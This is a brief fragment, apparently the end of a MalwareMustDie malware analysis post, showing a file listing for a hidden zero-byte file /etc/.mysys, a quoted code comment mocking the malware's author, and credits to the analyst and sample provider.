- ---------- 1 root root 0 Jul 28 20:11 /etc/.mysys
- /* Stupid coder…lol */
- ---
- #MalwareMustDie | analysis by @unixfreaxjp, samples: @wirehack7